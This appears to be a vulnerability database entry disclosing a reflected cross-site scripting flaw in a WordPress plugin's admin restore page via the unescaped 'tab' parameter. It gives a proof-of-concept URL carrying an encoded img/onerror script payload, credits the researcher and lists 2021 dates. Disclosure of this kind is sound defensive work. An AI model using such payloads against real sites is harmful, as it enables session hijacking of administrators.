The plugin does not sanitise or escape the tab parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
http://example.com/wp-admin/admin.php?page=buwd_restore&tab=general%22%3E%3Cimg%20src=x%20onerror=alert(document.domain);%20m0ze
m0ze
m0ze
Yes
2021-06-16 (about 1 years ago)
2021-06-16 (about 1 years ago)
2021-06-25 (about 1 years ago)